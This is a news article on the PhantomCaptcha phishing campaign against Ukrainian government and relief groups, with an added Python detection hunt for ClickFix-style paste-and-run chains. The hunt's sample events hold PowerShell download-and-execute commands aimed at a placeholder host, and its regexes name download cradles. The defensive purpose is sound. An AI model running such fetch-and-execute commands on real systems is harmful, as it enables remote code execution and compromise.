PhantomCaptcha phishing campaign targets Ukrainian government and relief orgs


A targeted spearphishing campaign, dubbed PhantomCaptcha, hit Ukrainian regional government offices and critical war relief organizations, including the International Committee of the Red Cross, UNICEF, and various NGOs, in a one-day blitz on October 8.

According to SentinelLABS, the threat intelligence arm of cybersecurity firm SentinelOne, the attack paired targeted social engineering with purpose-built malicious infrastructure: a spoofed Zoom site, a fake CAPTCHA that tricks the user into running a command themselves, and a custom WebSocket Remote Access Trojan (RAT) used for espionage and data theft.

The attack began with emails impersonating the Ukrainian President’s Office. The messages included PDFs linking to a fake Zoom domain (zoomconference[.]app), leading victims through a seemingly legitimate browser verification process during which a WebSocket client identifier was generated and sent to an attacker-controlled server. If validated, victims were redirected to a genuine password-protected Zoom meeting.

Visitors who did not pass that validation were instead served a fake CAPTCHA challenge in Ukrainian, which asked them to prove they were not robots by copying a "token" and pasting it into the Windows Command Prompt. In reality, the pasted text was a hidden PowerShell command that downloaded a malicious script (cptch); the script gathered system information and sent it to a command-and-control (C2) server. This paste-and-run lure is a variant of the technique commonly known as ClickFix: because the victim types the command into a local shell, the download never passes through the browser's or mail gateway's usual file-based defenses, and the process chain (cmd.exe spawning powershell.exe with a download cradle) is the most reliable place to catch it.
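The following is an added example, not code from the SentinelLABS report or from this article: a small Python hunt over constructed, Sysmon-style process-creation records that flags the execution chain described above, a user-facing shell spawning PowerShell with a hidden window, an encoded command or a download cradle. It generalises slightly beyond the article by also treating explorer.exe (the Windows Run dialog) as a user-facing parent, since the same paste-and-run lure is frequently delivered that way, and by decoding any `-EncodedCommand` argument so that indicators hidden inside the base64 blob are still matched. All command lines, hostnames, paths and process IDs in `SAMPLE_EVENTS` are invented for illustration and are not the PhantomCaptcha payload or infrastructure.

```python
"""Hunt for ClickFix-style 'paste this into your command prompt' chains.

Added example (not from the SentinelLABS report). Input is a list of
Sysmon-style process-creation records as dicts; output is a list of findings.
"""
import base64
import re
from typing import Optional

# Parents a human would paste a command into. Legitimate automation rarely
# launches PowerShell from an interactive cmd.exe or the Run dialog with the
# flags matched below.
USER_FACING_PARENTS = {"cmd.exe", "explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand / -enc / -e followed by a base64 blob.
ENCODED_RX = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects: UTF-16LE, then base64.
    Used here only to construct the sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None if it looks benign."""
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return None
    if basename(event["ParentImage"]) not in USER_FACING_PARENTS:
        return None
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    hits = set()
    if decoded is not None:
        hits.add("encoded_command")
        # Match indicators against the decoded script, not the opaque base64 blob.
        haystack = ENCODED_RX.sub(" ", cmdline) + " " + decoded
    else:
        haystack = cmdline
    hits.update(name for name, rx in INDICATORS.items() if rx.search(haystack))
    if not hits:
        return None
    return {"pid": event["ProcessId"], "parent": basename(event["ParentImage"]),
            "indicators": sorted(hits), "decoded": decoded}


def hunt(events: list) -> list:
    """Run analyze_event over a batch of records and keep only the findings."""
    return [f for f in map(analyze_event, events) if f]


# Constructed sample telemetry (hypothetical hosts, hashes and commands).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "iwr http://example.invalid/cptch -UseBasicParsing | iex"'},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand "
                    + encode_command("iwr('http://example.invalid/cptch') | iex")},
    {"ProcessId": 4201, "ParentImage": r"C:\Windows\System32\services.exe",   # scheduled task, not a paste
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -File C:\\Scripts\\inventory.ps1"},
    {"ProcessId": 4222, "ParentImage": r"C:\Windows\System32\cmd.exe",        # ordinary interactive use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Process"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The parent-process filter is deliberate: `-w hidden` and download cradles are common in legitimate scheduled tasks and management agents, so the signal here is the combination of those flags with a parent that only a human at the keyboard would produce. Feeding real Sysmon Event ID 1 or Windows 4688 records into `hunt()` only requires mapping their fields onto `ParentImage`, `Image`, `CommandLine` and `ProcessId`.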

The final payload was a lightweight WebSocket RAT, capable of remote command execution and exfiltration of data using base64-encoded JSON. Despite the campaign lasting just a day, researchers believe it is linked to follow-up operations that used adult-themed Android APKs and fake cloud tools to distribute spyware, especially in the Lviv region.

While SentinelLABS did not formally attribute PhantomCaptcha, the RAT was hosted on Russian infrastructure, and the associated mobile spyware campaign may trace back to Russia or Belarus.

Earlier this week, Google Threat Intelligence Group (GTIG) detailed a similar CAPTCHA abuse in attacks by ColdRiver (also known as Star Blizzard, UNC4057, or Callisto), a hacking group tied to the Russian FSB intelligence service. The researchers said that the threat actor shifted to a new malware family (Norobot, Yesrobot and Mayberobot) after its Lostkeys malware was exposed in May 2025.
